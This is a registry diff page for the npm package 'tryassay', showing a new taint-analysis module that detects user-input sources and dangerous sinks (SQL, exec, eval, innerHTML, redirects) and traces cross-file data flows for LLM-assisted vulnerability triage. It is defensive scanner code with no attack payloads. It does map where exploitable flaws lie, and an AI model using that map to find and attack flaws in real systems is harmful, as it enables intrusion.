npm - tryassay - Versions diffs - 0.33.0 → 0.33.2 - Mend

tryassay 0.33.0 → 0.33.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (81) hide show

package/dist/cli.js +2 -0
package/dist/cli.js.map +1 -1
package/dist/commands/hunt.d.ts +2 -0
package/dist/commands/hunt.js +58 -7
package/dist/commands/hunt.js.map +1 -1
package/dist/hunt/__tests__/finding-to-template.test.d.ts +1 -0
package/dist/hunt/__tests__/finding-to-template.test.js +213 -0
package/dist/hunt/__tests__/finding-to-template.test.js.map +1 -0
package/dist/hunt/__tests__/parse-utils.test.js +28 -1
package/dist/hunt/__tests__/parse-utils.test.js.map +1 -1
package/dist/hunt/__tests__/taint-analysis.test.d.ts +1 -0
package/dist/hunt/__tests__/taint-analysis.test.js +556 -0
package/dist/hunt/__tests__/taint-analysis.test.js.map +1 -0
package/dist/hunt/__tests__/templates.test.js +2 -2
package/dist/hunt/__tests__/templates.test.js.map +1 -1
package/dist/hunt/deep-dive.d.ts +2 -2
package/dist/hunt/deep-dive.js +4 -4
package/dist/hunt/deep-dive.js.map +1 -1
package/dist/hunt/discovery.js +2 -2
package/dist/hunt/discovery.js.map +1 -1
package/dist/hunt/finding-to-template.d.ts +47 -0
package/dist/hunt/finding-to-template.js +288 -0
package/dist/hunt/finding-to-template.js.map +1 -0
package/dist/hunt/orchestrator.d.ts +3 -0
package/dist/hunt/orchestrator.js +20 -5
package/dist/hunt/orchestrator.js.map +1 -1
package/dist/hunt/parse-utils.d.ts +6 -0
package/dist/hunt/parse-utils.js +28 -1
package/dist/hunt/parse-utils.js.map +1 -1
package/dist/hunt/taint-analysis.d.ts +49 -0
package/dist/hunt/taint-analysis.js +429 -0
package/dist/hunt/taint-analysis.js.map +1 -0
package/dist/hunt/templates/csv-injection.d.ts +2 -0
package/dist/hunt/templates/csv-injection.js +148 -0
package/dist/hunt/templates/csv-injection.js.map +1 -0
package/dist/hunt/templates/django-misconfig.d.ts +2 -0
package/dist/hunt/templates/django-misconfig.js +172 -0
package/dist/hunt/templates/django-misconfig.js.map +1 -0
package/dist/hunt/templates/express-misconfig.d.ts +2 -0
package/dist/hunt/templates/express-misconfig.js +156 -0
package/dist/hunt/templates/express-misconfig.js.map +1 -0
package/dist/hunt/templates/file-upload.d.ts +2 -0
package/dist/hunt/templates/file-upload.js +131 -0
package/dist/hunt/templates/file-upload.js.map +1 -0
package/dist/hunt/templates/graphql-abuse.d.ts +2 -0
package/dist/hunt/templates/graphql-abuse.js +161 -0
package/dist/hunt/templates/graphql-abuse.js.map +1 -0
package/dist/hunt/templates/hardcoded-credentials.d.ts +2 -0
package/dist/hunt/templates/hardcoded-credentials.js +109 -0
package/dist/hunt/templates/hardcoded-credentials.js.map +1 -0
package/dist/hunt/templates/idor.d.ts +2 -0
package/dist/hunt/templates/idor.js +102 -0
package/dist/hunt/templates/idor.js.map +1 -0
package/dist/hunt/templates/index.d.ts +2 -2
package/dist/hunt/templates/index.js +38 -5
package/dist/hunt/templates/index.js.map +1 -1
package/dist/hunt/templates/insecure-deserialization.d.ts +2 -0
package/dist/hunt/templates/insecure-deserialization.js +131 -0
package/dist/hunt/templates/insecure-deserialization.js.map +1 -0
package/dist/hunt/templates/mass-assignment.d.ts +2 -0
package/dist/hunt/templates/mass-assignment.js +101 -0
package/dist/hunt/templates/mass-assignment.js.map +1 -0
package/dist/hunt/templates/nextjs-misconfig.d.ts +2 -0
package/dist/hunt/templates/nextjs-misconfig.js +127 -0
package/dist/hunt/templates/nextjs-misconfig.js.map +1 -0
package/dist/hunt/templates/postmessage.d.ts +2 -0
package/dist/hunt/templates/postmessage.js +180 -0
package/dist/hunt/templates/postmessage.js.map +1 -0
package/dist/hunt/templates/race-condition.d.ts +2 -0
package/dist/hunt/templates/race-condition.js +138 -0
package/dist/hunt/templates/race-condition.js.map +1 -0
package/dist/hunt/templates/spring-misconfig.d.ts +2 -0
package/dist/hunt/templates/spring-misconfig.js +177 -0
package/dist/hunt/templates/spring-misconfig.js.map +1 -0
package/dist/hunt/templates/xxe.d.ts +2 -0
package/dist/hunt/templates/xxe.js +187 -0
package/dist/hunt/templates/xxe.js.map +1 -0
package/dist/hunt/triage.d.ts +2 -2
package/dist/hunt/triage.js +4 -4
package/dist/hunt/triage.js.map +1 -1
package/package.json +1 -1

package/dist/hunt/taint-analysis.js ADDED Viewed

@@ -0,0 +1,429 @@
+import { basename, dirname, resolve } from 'path';
+const SOURCE_PATTERNS = [
+    // JS/TS — Express / generic
+    { re: /\breq(?:uest)?\.params\b/gi, type: 'request-param' },
+    { re: /\breq(?:uest)?\.query\b/gi, type: 'query-string' },
+    { re: /\breq(?:uest)?\.body\b/gi, type: 'request-body' },
+    { re: /\breq(?:uest)?\.headers\b/gi, type: 'request-param' },
+    { re: /\breq(?:uest)?\.cookies\b/gi, type: 'request-param' },
+    // Koa
+    { re: /\bctx\.params\b/gi, type: 'request-param' },
+    { re: /\bctx\.query\b/gi, type: 'query-string' },
+    { re: /\bctx\.request\.body\b/gi, type: 'request-body' },
+    // Lambda
+    { re: /\bevent\.body\b/gi, type: 'request-body' },
+    { re: /\bevent\.queryStringParameters\b/gi, type: 'query-string' },
+    // React Router hooks
+    { re: /\buseSearchParams\s*\(\)/gi, type: 'query-string' },
+    { re: /\buseParams\s*\(\)/gi, type: 'url-param' },
+    // FormData
+    { re: /\bformData\.get\s*\(/gi, type: 'user-input' },
+    { re: /\bnew\s+FormData\s*\(/gi, type: 'user-input' },
+    // URL parsing
+    { re: /new\s+URL\s*\([^)]*\)\.searchParams/gi, type: 'query-string' },
+    // File upload
+    { re: /\breq(?:uest)?\.files?\b/gi, type: 'file-upload' },
+    { re: /\bmulter\b/gi, type: 'file-upload' },
+    // WebSocket
+    { re: /\bws\.on\s*\(\s*['"]message['"]/gi, type: 'websocket' },
+    { re: /\bsocket\.on\s*\(\s*['"]message['"]/gi, type: 'websocket' },
+    // Environment variables
+    { re: /\bprocess\.env\b/gi, type: 'env-var' },
+    // Python — Django
+    { re: /\brequest\.GET\b/g, type: 'query-string' },
+    { re: /\brequest\.POST\b/g, type: 'request-body' },
+    { re: /\brequest\.FILES\b/g, type: 'file-upload' },
+    { re: /\brequest\.data\b/gi, type: 'request-body' },
+    // Python — Flask
+    { re: /\brequest\.args\b/g, type: 'query-string' },
+    { re: /\brequest\.form\b/g, type: 'request-body' },
+    { re: /\brequest\.json\b/g, type: 'request-body' },
+    // Python — DRF
+    { re: /\bself\.request\.query_params\b/g, type: 'query-string' },
+    { re: /\bself\.request\.data\b/g, type: 'request-body' },
+    // Java
+    { re: /@RequestParam\b/g, type: 'request-param' },
+    { re: /@PathVariable\b/g, type: 'url-param' },
+    { re: /@RequestBody\b/g, type: 'request-body' },
+    { re: /\brequest\.getParameter\s*\(/gi, type: 'request-param' },
+    { re: /\brequest\.getHeader\s*\(/gi, type: 'request-param' },
+];
+const SINK_PATTERNS = [
+    // JS/TS — SQL
+    { re: /\b(?:db|pool|connection|client|knex|prisma)\.\s*(?:query|execute|raw)\s*\(/gi, type: 'sql-query' },
+    { re: /\b(?:db|pool|connection|client)\.\s*(?:\$queryRaw|queryRaw)\s*\(/gi, type: 'sql-query' },
+    // JS/TS — command exec
+    { re: /\b(?:exec|execSync)\s*\(/gi, type: 'command-exec' },
+    { re: /\b(?:spawn|execFile|spawnSync)\s*\(/gi, type: 'command-exec' },
+    // JS/TS — file ops
+    { re: /\bfs\.\s*(?:readFile|writeFile|unlink|readdir|mkdir|rmdir|rename|copyFile)\s*(?:Sync)?\s*\(/gi, type: 'file-op' },
+    // JS/TS — redirect
+    { re: /\b(?:res|response)\.redirect\s*\(/gi, type: 'redirect' },
+    { re: /\blocation\.href\s*=/gi, type: 'redirect' },
+    // JS/TS — response write
+    { re: /\b(?:res|response)\.(?:send|write|json|end)\s*\(/gi, type: 'response-write' },
+    // JS/TS — XSS
+    { re: /\binnerHTML\s*=/gi, type: 'inner-html' },
+    { re: /\bdangerouslySetInnerHTML\b/gi, type: 'inner-html' },
+    // JS/TS — eval
+    { re: /\beval\s*\(/gi, type: 'eval' },
+    { re: /\bnew\s+Function\s*\(/gi, type: 'eval' },
+    // Python — SQL
+    { re: /\b(?:cursor|connection)\.execute\s*\(/gi, type: 'sql-query' },
+    // Python — command exec
+    { re: /\bos\.system\s*\(/gi, type: 'command-exec' },
+    { re: /\bsubprocess\.(?:run|Popen|call|check_output)\s*\(/gi, type: 'command-exec' },
+    // Python — file ops
+    { re: /\bopen\s*\([^)]*['"]\s*[rwa]/gi, type: 'file-op' },
+    // Python — redirect
+    { re: /\bredirect\s*\(/gi, type: 'redirect' },
+    { re: /\bHttpResponseRedirect\s*\(/gi, type: 'redirect' },
+    // Python — template render
+    { re: /\bmark_safe\s*\(/gi, type: 'template-render' },
+    { re: /\|\s*safe\b/gi, type: 'template-render' },
+    // Java — SQL
+    { re: /\bstatement\.execute(?:Query|Update)?\s*\(/gi, type: 'sql-query' },
+    // Java — command exec
+    { re: /\bRuntime\.getRuntime\(\)\.exec\s*\(/gi, type: 'command-exec' },
+    // Java — redirect
+    { re: /\bresponse\.sendRedirect\s*\(/gi, type: 'redirect' },
+];
+// ---------------------------------------------------------------------------
+// Import graph building
+// ---------------------------------------------------------------------------
+/**
+ * Build a graph of import edges between discovered files.
+ * Resolves relative imports (./foo, ../bar) to discovered file paths.
+ */
+export function buildImportGraph(files) {
+    // Build a lookup: relativePath -> DiscoveredFile
+    const byRelPath = new Map();
+    for (const f of files) {
+        byRelPath.set(f.relativePath, f);
+        // Also index without extension for resolution
+        const noExt = stripExtension(f.relativePath);
+        if (!byRelPath.has(noExt)) {
+            byRelPath.set(noExt, f);
+        }
+    }
+    const edges = [];
+    for (const file of files) {
+        for (const imp of file.imports) {
+            const resolved = resolveImport(file.relativePath, imp, byRelPath);
+            if (resolved) {
+                const symbols = extractImportedSymbols(file.content, imp);
+                edges.push({
+                    from: file.relativePath,
+                    to: resolved.relativePath,
+                    symbols,
+                });
+            }
+        }
+    }
+    return edges;
+}
+function stripExtension(p) {
+    return p.replace(/\.\w+$/, '');
+}
+/**
+ * Resolve an import specifier to a discovered file.
+ * Handles relative paths (./foo, ../utils/bar) and
+ * tries common extensions (.ts, .js, .tsx, .jsx, /index.ts, etc.).
+ */
+function resolveImport(importerRelPath, importSpec, fileMap) {
+    // Only resolve relative imports
+    if (!importSpec.startsWith('.')) {
+        // For bare specifiers, try matching by filename
+        const specBase = importSpec.split('/').pop() || importSpec;
+        for (const [relPath, f] of fileMap) {
+            const fileBase = basename(relPath).replace(/\.\w+$/, '');
+            if (fileBase === specBase && relPath === f.relativePath) {
+                return f;
+            }
+        }
+        return undefined;
+    }
+    const importerDir = dirname(importerRelPath);
+    const resolved = normalizeSlashes(resolve('/', importerDir, importSpec)).slice(1); // remove leading /
+    // Try exact match first
+    if (fileMap.has(resolved) && isRealFile(resolved, fileMap))
+        return fileMap.get(resolved);
+    // Try common extensions
+    const extensions = ['.ts', '.tsx', '.js', '.jsx', '.py', '.java', '.go', '.rs', '.rb', '.php'];
+    for (const ext of extensions) {
+        const withExt = resolved + ext;
+        if (fileMap.has(withExt) && isRealFile(withExt, fileMap))
+            return fileMap.get(withExt);
+    }
+    // Try /index variants
+    for (const ext of extensions) {
+        const indexPath = resolved + '/index' + ext;
+        if (fileMap.has(indexPath) && isRealFile(indexPath, fileMap))
+            return fileMap.get(indexPath);
+    }
+    // Try without .js extension (common in TS imports with .js specifiers)
+    const noJs = resolved.replace(/\.js$/, '');
+    if (noJs !== resolved) {
+        if (fileMap.has(noJs) && isRealFile(noJs, fileMap))
+            return fileMap.get(noJs);
+        for (const ext of extensions) {
+            const candidate = noJs + ext;
+            if (fileMap.has(candidate) && isRealFile(candidate, fileMap))
+                return fileMap.get(candidate);
+        }
+    }
+    return undefined;
+}
+/** Check that a fileMap key corresponds to the file's actual relativePath (not a stripped-extension alias) */
+function isRealFile(key, fileMap) {
+    const f = fileMap.get(key);
+    return f !== undefined && f.relativePath === key;
+}
+function normalizeSlashes(p) {
+    return p.replace(/\\/g, '/');
+}
+/**
+ * Extract the named symbols from an import statement.
+ * e.g. `import { foo, bar } from './x'` -> ['foo', 'bar']
+ *      `import db from './x'` -> ['db']
+ */
+function extractImportedSymbols(content, importSpec) {
+    const escaped = importSpec.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
+    // Match: import { a, b } from 'spec'  OR  import X from 'spec'  OR  import * as X from 'spec'
+    const re = new RegExp(`import\\s+(?:\\{([^}]+)\\}|\\*\\s+as\\s+(\\w+)|(\\w+))\\s+from\\s+['"]${escaped}['"]`, 'g');
+    const symbols = [];
+    let match;
+    while ((match = re.exec(content)) !== null) {
+        if (match[1]) {
+            // Named imports: { a, b as c }
+            for (const part of match[1].split(',')) {
+                const trimmed = part.trim();
+                if (!trimmed)
+                    continue;
+                // Handle `x as y` — take the local name
+                const asMatch = trimmed.match(/(\w+)\s+as\s+(\w+)/);
+                symbols.push(asMatch ? asMatch[2] : trimmed);
+            }
+        }
+        else if (match[2]) {
+            // Namespace import: * as X
+            symbols.push(match[2]);
+        }
+        else if (match[3]) {
+            // Default import
+            symbols.push(match[3]);
+        }
+    }
+    // Also check require patterns
+    const reqRe = new RegExp(`(?:const|let|var)\\s+(?:\\{([^}]+)\\}|(\\w+))\\s*=\\s*require\\s*\\(\\s*['"]${escaped}['"]\\s*\\)`, 'g');
+    while ((match = reqRe.exec(content)) !== null) {
+        if (match[1]) {
+            for (const part of match[1].split(',')) {
+                const trimmed = part.trim();
+                if (trimmed)
+                    symbols.push(trimmed);
+            }
+        }
+        else if (match[2]) {
+            symbols.push(match[2]);
+        }
+    }
+    return symbols;
+}
+// ---------------------------------------------------------------------------
+// Source & sink detection
+// ---------------------------------------------------------------------------
+export function findSources(files) {
+    const sources = [];
+    for (const file of files) {
+        const lines = file.content.split('\n');
+        for (let i = 0; i < lines.length; i++) {
+            const line = lines[i];
+            for (const pattern of SOURCE_PATTERNS) {
+                pattern.re.lastIndex = 0;
+                let m;
+                while ((m = pattern.re.exec(line)) !== null) {
+                    sources.push({
+                        file: file.relativePath,
+                        line: i + 1,
+                        type: pattern.type,
+                        identifier: m[0].trim(),
+                    });
+                }
+            }
+        }
+    }
+    return sources;
+}
+export function findSinks(files) {
+    const sinks = [];
+    for (const file of files) {
+        const lines = file.content.split('\n');
+        for (let i = 0; i < lines.length; i++) {
+            const line = lines[i];
+            for (const pattern of SINK_PATTERNS) {
+                pattern.re.lastIndex = 0;
+                let m;
+                while ((m = pattern.re.exec(line)) !== null) {
+                    sinks.push({
+                        file: file.relativePath,
+                        line: i + 1,
+                        type: pattern.type,
+                        identifier: m[0].trim(),
+                    });
+                }
+            }
+        }
+    }
+    return sinks;
+}
+// ---------------------------------------------------------------------------
+// Taint context building
+// ---------------------------------------------------------------------------
+/**
+ * Build a TaintContext for a target file, showing:
+ * - Sources and sinks within the file
+ * - Related files that import from or are imported by the target
+ * - Data flow paths tracing sources through imports to sinks
+ */
+export function buildTaintContext(targetFile, allFiles, importGraph, sources, sinks) {
+    const filePath = targetFile.relativePath;
+    // Sources and sinks in the target file
+    const localSources = sources.filter(s => s.file === filePath);
+    const localSinks = sinks.filter(s => s.file === filePath);
+    // Files that import the target (dependents)
+    const importedBy = importGraph.filter(e => e.to === filePath);
+    // Files that the target imports (dependencies)
+    const importsFrom = importGraph.filter(e => e.from === filePath);
+    // Collect related files: upstream sources that flow into this file's sinks
+    const relatedFiles = [];
+    const dataFlowPaths = [];
+    if (localSinks.length > 0) {
+        // Trace backwards: who imports this file or is imported by this file?
+        // Look for source files in the dependency chain
+        const upstreamFiles = new Set();
+        // Direct imports: if target imports file X, and X has sources -> data may flow in
+        for (const edge of importsFrom) {
+            upstreamFiles.add(edge.to);
+        }
+        // Files that import target: they may pass user input as arguments
+        for (const edge of importedBy) {
+            upstreamFiles.add(edge.from);
+        }
+        // Also check 2nd-degree: files that import the files that import target
+        for (const edge of importedBy) {
+            const grandparentEdges = importGraph.filter(e => e.to === edge.from && e.from !== filePath);
+            for (const e2 of grandparentEdges) {
+                upstreamFiles.add(e2.from);
+            }
+        }
+        // For each upstream file, check if it has sources
+        for (const upPath of upstreamFiles) {
+            const upSources = sources.filter(s => s.file === upPath);
+            if (upSources.length === 0)
+                continue;
+            const upFile = allFiles.find(f => f.relativePath === upPath);
+            if (!upFile)
+                continue;
+            // Find the connecting edge(s)
+            const directEdge = importsFrom.find(e => e.to === upPath);
+            const reverseEdge = importedBy.find(e => e.from === upPath);
+            const relevance = directEdge
+                ? `imports ${directEdge.symbols.join(', ') || 'module'} from this file`
+                : reverseEdge
+                    ? `calls ${reverseEdge.symbols.join(', ') || 'exports'} from target`
+                    : 'in dependency chain';
+            // Build a snippet showing the source lines
+            const sourceSnippet = upSources
+                .slice(0, 5)
+                .map(s => {
+                const srcLine = upFile.content.split('\n')[s.line ? s.line - 1 : 0];
+                return `L${s.line}: ${srcLine?.trim() || s.identifier}`;
+            })
+                .join('\n');
+            relatedFiles.push({
+                path: upPath,
+                relevance,
+                snippet: sourceSnippet,
+            });
+            // Build data flow path descriptions
+            for (const src of upSources.slice(0, 3)) {
+                for (const sink of localSinks.slice(0, 3)) {
+                    const throughSymbols = directEdge?.symbols.join(', ') || reverseEdge?.symbols.join(', ') || '?';
+                    dataFlowPaths.push(`${src.type} in ${upPath}:${src.line} → ${throughSymbols} → ${sink.type} in ${filePath}:${sink.line}`);
+                }
+            }
+        }
+    }
+    // Also check if this file has sources and exports them (other files' sinks may consume)
+    if (localSources.length > 0) {
+        for (const edge of importedBy) {
+            const downSinks = sinks.filter(s => s.file === edge.from);
+            if (downSinks.length === 0)
+                continue;
+            const downFile = allFiles.find(f => f.relativePath === edge.from);
+            if (!downFile)
+                continue;
+            const sinkSnippet = downSinks
+                .slice(0, 5)
+                .map(s => {
+                const sinkLine = downFile.content.split('\n')[s.line ? s.line - 1 : 0];
+                return `L${s.line}: ${sinkLine?.trim() || s.identifier}`;
+            })
+                .join('\n');
+            // Avoid duplicate entries
+            if (!relatedFiles.some(rf => rf.path === edge.from)) {
+                relatedFiles.push({
+                    path: edge.from,
+                    relevance: `imports ${edge.symbols.join(', ') || 'exports'} and has sinks`,
+                    snippet: sinkSnippet,
+                });
+            }
+            for (const src of localSources.slice(0, 3)) {
+                for (const sink of downSinks.slice(0, 3)) {
+                    dataFlowPaths.push(`${src.type} in ${filePath}:${src.line} → ${edge.symbols.join(', ') || '?'} → ${sink.type} in ${edge.from}:${sink.line}`);
+                }
+            }
+        }
+    }
+    return {
+        file: filePath,
+        sources: localSources,
+        sinks: localSinks,
+        dataFlowPaths,
+        relatedFiles,
+    };
+}
+// ---------------------------------------------------------------------------
+// Formatting for LLM prompt injection
+// ---------------------------------------------------------------------------
+/**
+ * Format a TaintContext into a human-readable string for injection into
+ * triage/deep-dive LLM prompts.
+ * Returns empty string if there's no cross-file context worth showing.
+ */
+export function formatTaintContext(ctx) {
+    // Only produce output if there are cross-file data flows
+    if (ctx.relatedFiles.length === 0 && ctx.dataFlowPaths.length === 0) {
+        return '';
+    }
+    const sections = [];
+    if (ctx.sources.length > 0) {
+        const sourceLines = ctx.sources.slice(0, 10).map(s => `  - ${s.type} at L${s.line}: ${s.identifier}`);
+        sections.push(`SOURCES (user-controlled data entry points in this file):\n${sourceLines.join('\n')}`);
+    }
+    if (ctx.sinks.length > 0) {
+        const sinkLines = ctx.sinks.slice(0, 10).map(s => `  - ${s.type} at L${s.line}: ${s.identifier}`);
+        sections.push(`SINKS (dangerous operations in this file):\n${sinkLines.join('\n')}`);
+    }
+    if (ctx.dataFlowPaths.length > 0) {
+        const flowLines = ctx.dataFlowPaths.slice(0, 10).map(f => `  - ${f}`);
+        sections.push(`DATA FLOW PATHS (how user input may reach dangerous operations):\n${flowLines.join('\n')}`);
+    }
+    if (ctx.relatedFiles.length > 0) {
+        const relatedSections = ctx.relatedFiles.slice(0, 5).map(rf => `  FILE: ${rf.path}\n  RELEVANCE: ${rf.relevance}\n  CODE:\n${rf.snippet.split('\n').map(l => '    ' + l).join('\n')}`);
+        sections.push(`RELATED FILES (cross-file data flow context):\n${relatedSections.join('\n\n')}`);
+    }
+    return sections.join('\n\n');
+}
+//# sourceMappingURL=taint-analysis.js.map

package/dist/hunt/taint-analysis.js.map ADDED Viewed

@@ -0,0 +1 @@

+ {"version":3,"file":"taint-analysis.js","sourceRoot":"","sources":["../../src/hunt/taint-analysis.ts"],"names":[],"mappings":"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